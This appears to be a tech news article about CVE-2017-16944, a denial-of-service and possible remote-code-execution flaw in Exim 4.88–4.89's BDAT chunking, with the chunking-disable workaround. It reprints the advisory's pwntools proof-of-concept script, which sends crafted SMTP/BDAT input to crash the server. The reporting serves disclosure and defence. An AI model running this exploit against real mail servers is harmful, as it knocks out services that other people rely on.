Exim-ergency! Unix mailer has RCE, DoS vulnerabilities

Patch imminent, for now please turn off email attachment chunking

Sysadmins who tend Exim servers have been advised to kick off their working weeks with the joy of patching.

The popular (if relatively low-profile) Internet mail message transfer agent (MTA) advised of flaws in a Black Friday post to its public bugtracker, which as contributor Phil Pennock said in this message came without any prior notice.

The bug tracker post explained that when parsing the BDAT data header, Exim scans for the '.' character to signify the end of an email. BDAT is a server verb associated with the MTA's ability to handle large attachments in chunks (see RFC 1830, for example).

The advisory included a proof-of-concept (less than 30 lines, below). The poster explained that because a function pointer, receive_getc is not reset, the PoC makes Exim run out of stack and crash.

The announcement for CVE-2017-16944 identified the slip as existing in the “receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89”.

Confirming the bug, Pennock said the developers have a “tentative patch” but it needs to be confirmed.

The workaround in the meantime, he said, is to disable chunking by setting the following flag:

chunking_advertise_hosts=

The empty value after the equal sign turns off the vulnerable function.

According to a November 2017 study by E-Soft, Exim is by far the most popular MTA on the Internet, in use on nearly 57 per cent of MX servers it identified. ®

The proof-of-concept

# pip install pwntools
from pwn import *

r = remote('localhost', 25)

r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<test@localhost>")
r.recvline()
r.sendline("RCPT TO:<test@localhost>")
r.recvline()
#raw_input()
r.sendline('a'*0x1100+'\x7f')
#raw_input()
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
#raw_input()
r.send('\n')
r.interactive()
exit()



Biting the hand that feeds IT © 1998–2018